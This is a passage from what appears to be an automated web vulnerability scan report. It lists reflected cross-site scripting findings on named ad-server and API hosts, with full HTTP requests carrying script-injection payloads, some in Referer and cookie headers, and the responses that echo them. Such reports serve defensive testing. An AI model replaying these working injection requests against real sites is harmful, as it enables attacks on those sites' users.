Path:   /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad316"><script>alert(1)</script>c5ed9f78d89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943&ad316"><script>alert(1)</script>c5ed9f78d89=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 270

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943&ad316"><script>alert(1)</script>c5ed9f78d89=1;adiframe=y">
...[SNIP]...

2.25. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa629"><script>alert(1)</script>ae7026f283f was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943fa629"><script>alert(1)</script>ae7026f283f HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 267

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943fa629"><script>alert(1)</script>ae7026f283f;adiframe=y">
...[SNIP]...

2.26. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 7b45d><script>alert(1)</script>7f8724349bc was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=7b45d><script>alert(1)</script>7f8724349bc HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 284

<html><body><base target=7b45d><script>alert(1)</script>7f8724349bc><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;t
...[SNIP]...

2.27. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5927c"><script>alert(1)</script>441730d7db1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH5927c"><script>alert(1)</script>441730d7db1;target=_blank;grp=9112943 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 267

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH5927c"><script>alert(1)</script>441730d7db1;target=_blank;grp=9112943;adiframe=y">
...[SNIP]...

2.28. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef357"><script>alert(1)</script>0faf3202082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943&ef357"><script>alert(1)</script>0faf3202082=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 270

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943&ef357"><script>alert(1)</script>0faf3202082=1;adiframe=y">
...[SNIP]...

2.29. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae473"><script>alert(1)</script>ccd142fd795 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943ae473"><script>alert(1)</script>ccd142fd795 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 267

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943ae473"><script>alert(1)</script>ccd142fd795;adiframe=y">
...[SNIP]...

2.30. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4271d><script>alert(1)</script>2a331f8adb9 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=4271d><script>alert(1)</script>2a331f8adb9 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 284

<html><body><base target=4271d><script>alert(1)</script>2a331f8adb9><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;t
...[SNIP]...

2.31. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec59"><script>alert(1)</script>023a78beb19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH1ec59"><script>alert(1)</script>023a78beb19;target=_blank;grp=9112943 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 268

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH1ec59"><script>alert(1)</script>023a78beb19;target=_blank;grp=9112943;adiframe=y">
...[SNIP]...

2.32. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee892"><script>alert(1)</script>2c0638b6731 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943&ee892"><script>alert(1)</script>2c0638b6731=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 271

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943&ee892"><script>alert(1)</script>2c0638b6731=1;adiframe=y">
...[SNIP]...

2.33. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6b7bf><script>alert(1)</script>475490e67fb was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=6b7bf><script>alert(1)</script>475490e67fb HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=6b7bf><script>alert(1)</script>475490e67fb><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;
...[SNIP]...

2.34. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0236"><script>alert(1)</script>53375651d8e was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943d0236"><script>alert(1)</script>53375651d8e HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 268

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943d0236"><script>alert(1)</script>53375651d8e;adiframe=y">
...[SNIP]...

2.35. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52025"><script>alert(1)</script>9a88a4436ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH52025"><script>alert(1)</script>9a88a4436ff;target=_blank;grp=9112943 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 268

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH52025"><script>alert(1)</script>9a88a4436ff;target=_blank;grp=9112943;adiframe=y">
...[SNIP]...

2.36. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae9a"><script>alert(1)</script>4eace70c3c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943&fae9a"><script>alert(1)</script>4eace70c3c7=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 271

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943&fae9a"><script>alert(1)</script>4eace70c3c7=1;adiframe=y">
...[SNIP]...

2.37. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c6b"><script>alert(1)</script>29753d2027c was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943b9c6b"><script>alert(1)</script>29753d2027c HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 268

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943b9c6b"><script>alert(1)</script>29753d2027c;adiframe=y">
...[SNIP]...

2.38. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 531f7><script>alert(1)</script>a211c727b97 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=531f7><script>alert(1)</script>a211c727b97 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=531f7><script>alert(1)</script>a211c727b97><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;
...[SNIP]...

2.39. http://api.typepad.com/blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.typepad.com
Path:   /blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 479ae<script>alert(1)</script>c95f7cd83e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js?479ae<script>alert(1)</script>c95f7cd83e8=1 HTTP/1.1
Host: api.typepad.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=151985724.1292505849.1.1.utmcsr=sixapart.com|utmccn=(referral)|utmcmd=referral|utmcct=/ns21bc1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eddc017331/at; __utma=151985724.1810450472.1292505849.1292505849.1292505849.1; __utmc=151985724; __utmb=151985724.1.10.1292505849;

Response

HTTP/1.0 400 Bad Request
Date: Thu, 16 Dec 2010 15:01:12 GMT
Server: Apache
X-Webserver: oak-tp-app004
Access-Control-Allow-Origin: *
Content-Length: 66
Content-Type: text/plain; charset=utf-8

Invalid query arguments: 479ae<script>alert(1)</script>c95f7cd83e8

2.40. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload facd8"><script>alert(1)</script>854027c3dcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframefacd8"><script>alert(1)</script>854027c3dcd/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addynfacd8"><script>alert(1)</script>854027c3dcd/3.0/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.41. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696bf"><script>alert(1)</script>ef60ef84e1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0696bf"><script>alert(1)</script>ef60ef84e1e/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
